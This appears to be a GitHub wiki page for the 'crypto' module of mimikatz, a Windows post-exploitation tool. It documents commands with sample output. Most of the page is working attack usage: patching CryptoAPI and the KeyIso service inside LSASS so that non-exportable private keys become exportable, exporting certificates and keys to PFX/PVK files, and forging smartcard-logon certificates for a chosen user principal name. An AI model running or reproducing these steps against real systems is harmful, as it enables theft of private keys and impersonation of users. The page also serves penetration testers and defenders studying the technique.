-
Notifications
You must be signed in to change notification settings - Fork 3.7k
module ~ crypto
This module, one of the oldest, plays with CryptoAPI
functions. Basically it's a little certutil
that benefit of token impersonation, patch legacy CryptoAPI
functions and patch CNG
key isolation service.
Commands: providers, stores, sc, scauth, certificates, keys, capi, cng
This command list all providers: CryptoAPI, then CNG if available (NT 6).
mimikatz # crypto::providers
CryptoAPI providers :
0. RSA_FULL ( 1) - Microsoft Base Cryptographic Provider v1.0
1. DSS_DH (13) - Microsoft Base DSS and Diffie-Hellman Cryptographic Provider
2. DSS ( 3) - Microsoft Base DSS Cryptographic Provider
3. RSA_FULL ( 1) - Microsoft Base Smart Card Crypto Provider
4. DH_SCHANNEL (18) - Microsoft DH SChannel Cryptographic Provider
5. RSA_FULL ( 1) - Microsoft Enhanced Cryptographic Provider v1.0
6. DSS_DH (13) - Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider
7. RSA_AES (24) - Microsoft Enhanced RSA and AES Cryptographic Provider
8. RSA_SCHANNEL (12) - Microsoft RSA SChannel Cryptographic Provider
9. RSA_FULL ( 1) - Microsoft Strong Cryptographic Provider
CryptoAPI provider types:
0. RSA_FULL ( 1) - RSA Full (Signature and Key Exchange)
1. DSS ( 3) - DSS Signature
2. RSA_SCHANNEL (12) - RSA SChannel
3. DSS_DH (13) - DSS Signature with Diffie-Hellman Key Exchange
4. DH_SCHANNEL (18) - Diffie-Hellman SChannel
5. RSA_AES (24) - RSA Full and AES
CNG providers :
0. Microsoft Key Protection Provider
1. Microsoft Passport Key Storage Provider
2. Microsoft Platform Crypto Provider
3. Microsoft Primitive Provider
4. Microsoft Smart Card Key Storage Provider
5. Microsoft Software Key Storage Provider
6. Microsoft SSL Protocol Provider
7. Windows Client Key Protection Provider
This command lists logical store in a system store.
Arguments:
-
/systemstore
- optional - the system store that must be used to list stores (default:CERT_SYSTEM_STORE_CURRENT_USER
)
It can be one of:-
CERT_SYSTEM_STORE_CURRENT_USER
orCURRENT_USER
-
CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY
orUSER_GROUP_POLICY
-
CERT_SYSTEM_STORE_LOCAL_MACHINE
orLOCAL_MACHINE
-
CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY
orLOCAL_MACHINE_GROUP_POLICY
-
CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE
orLOCAL_MACHINE_ENTERPRISE
-
CERT_SYSTEM_STORE_CURRENT_SERVICE
orCURRENT_SERVICE
-
CERT_SYSTEM_STORE_USERS
orUSERS
-
CERT_SYSTEM_STORE_SERVICES
orSERVICES
-
mimikatz # crypto::stores /systemstore:local_machine
Asking for System Store 'local_machine' (0x00020000)
0. My
1. Root
2. Trust
3. CA
4. TrustedPublisher
5. Disallowed
6. AuthRoot
7. TrustedPeople
8. ADDRESSBOOK
9. ipcu
10. Remote Desktop
11. REQUEST
12. SmartCardRoot
13. TrustedDevices
14. Windows Live ID Token Issuer
This command lists smartcard/token reader(s) on, or deported to, the system. When the CSP is available, it tries to list keys on the smartcard.
mimikatz # crypto::sc
SmartCard readers:
* OMNIKEY CardMan 3x21 0
ATR : 3bb794008131fe6553504b32339000d1
Model: G&D SPK 2.3 T=1
CSP : SafeSign Standard Cryptographic Service Provider
0. 34C99D73A1FAE4D44F9966DF626623DF18858C83
34C99D73A1FAE4D44F9966DF626623DF18858C83
Type : AT_KEYEXCHANGE (0x00000001)
Exportable key : NO
Key size : 1024
* SCM Microsystems Inc. SCR35xx USB Smart Card Reader 0
This command creates a client certificate for smartcard authentication, signed by a Certificate Authority
Arguments:
-
/caname
- the subject name of the certificate authority (needed to sign the certificate) -
/castore
- optional - the system store that contains the certificate authority (default:CERT_SYSTEM_STORE_LOCAL_MACHINE
) -
/upn
- the User Principal Name (UPN
) targetted (eg:user@lab.local
) -
/pfx
- optional - the filename for saving the final certificate (default: no file, stored inCERT_SYSTEM_STORE_CURRENT_USER
)
mimikatz # crypto::scauth /caname:KiwiAC /upn:user@lab.local /pfx:user.pfx
CA store : LOCAL_MACHINE
CA name : KiwiAC
CA validity : 22/08/2016 22:00:36 -> 22/08/2021 22:10:35
Certificate UPN: user@lab.local
Key container : {a1bd29ec-4203-4aac-8159-40f28f96335b}
Key provider : Microsoft Enhanced Cryptographic Provider v1.0
Private Export : user.pfx - OK
This command lists certificates and properties of theirs keys. It can export certificates too.
Arguments:
-
/systemstore
- optional - the system store that must be used (default:CERT_SYSTEM_STORE_CURRENT_USER
) -
/store
- optional - the store that must be used to list/export certificates (default:My
) - full list withcrypto::stores
-
/export
- optional - export all certificates to files (public parts inDER
, private parts inPFX
files - password protected with:mimikatz
) -
/silent
- optional - if user interaction is required, then abort -
/nokey
- optional - do not try to interact with the private key
mimikatz # crypto::capi
Local CryptoAPI patched
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # crypto::cng
"KeyIso" service patched
mimikatz # crypto::certificates /systemstore:local_machine /store:my /export
* System Store : 'local_machine' (0x00020000)
* Store : 'my'
0. example.domain.local
Key Container : example.domain.local
Provider : Microsoft Software Key Storage Provider
Type : CNG Key (0xffffffff)
Exportable key : NO
Key size : 2048
Public export : OK - 'local_machine_my_0_example.domain.local.der'
Private export : OK - 'local_machine_my_0_example.domain.local.pfx'
Remarks:
- See
crypto::stores
for validsystemstore
list, and its output forstore
list. - Non exportable keys (with
KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x8009000b)
) can often be exported withcrypto::capi
and/orcrypto::cng
- Despite
crypto::capi
orcrypto::cng
patch, you must have correct ACL on filesystem to access private keys (UAC... 😉) - Some smartcard crypto providers can report a successfull private export (it's not, of course 😉)
This command lists keys, by provider. It can export keys too.
Arguments:
-
/provider
- optional - the legacyCryptoAPI
provider (default:MS_ENHANCED_PROV
) -
/providertype
- optional - the legacyCryptoAPI
provider type (default:PROV_RSA_FULL
) -
/cngprovider
- optional - theCNG
provider (default:Microsoft Software Key Storage Provider
) -
/export
- optional - export all key toPVK
files -
/silent
- optional - if user interaction is required, then abort
full list of providers details crypto::providers
mimikatz # crypto::keys /export
* Store : 'user'
* Provider : 'MS_ENHANCED_PROV' ('Microsoft Enhanced Cryptographic Provider v1.0')
* Provider type : 'PROV_RSA_FULL' (1)
* CNG Provider : 'Microsoft Software Key Storage Provider'
CryptoAPI keys :
0. myCapiKey
223311d3b5d990f48c65070b883b9ef1_33b8db1c-b3d2-4912-b24e-fc0742b704c1
Type : AT_KEYEXCHANGE (0x00000001)
Exportable key : YES
Key size : 2048
Private export : OK - 'user_capi_0_myCapiKey.pvk'
1. OC_KeyContainer_Lync_user@domain.local
49e3a9228aa9a33357545413fba35d07_33b8db1c-b3d2-4912-b24e-fc0742b704c1
Type : AT_SIGNATURE (0x00000002)
Exportable key : NO
Key size : 2048
Private export : KO - ERROR kuhl_m_crypto_exportKeyToFile ; Export / CreateFile (0x8009000b)
CNG keys :
0. mykey-d535a6d8-70f5-496f-8c85-17c8fd26f379
98a436bd6f4caa9b24379112b577f688_33b8db1c-b3d2-4912-b24e-fc0742b704c1
Exportable key : NO
Key size : 2048
Private export : KO - ERROR kuhl_m_crypto_exportKeyToFile ; Export / CreateFile (0x80090029)
Remarks:
- If needed, you can convert
PVK
files with:openssl rsa -inform pvk -in key.pvk -outform pem -out key.pem
This patch modify a CryptoAPI
function, in the mimikatz
process, in order to make unexportable keys, exportable (no specifig right other than access to the private key is needed)
This is only useful when the keys provider is one of:
Microsoft Base Cryptographic Provider v1.0
Microsoft Enhanced Cryptographic Provider v1.0
Microsoft Enhanced RSA and AES Cryptographic Provider
Microsoft RSA SChannel Cryptographic Provider
Microsoft Strong Cryptographic Provider
can be used with crypto::certificates
and crypto::keys
mimikatz # crypto::capi
Local CryptoAPI patched
This patch modify KeyIso
service, in LSASS
process, in order to make unexportable keys, exportable
This is only useful when the keys provider is Microsoft Software Key Storage Provider
(you do not need to patch CNG
for other providers).
can be used with crypto::certificates
and crypto::keys
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # crypto::cng
"KeyIso" service patched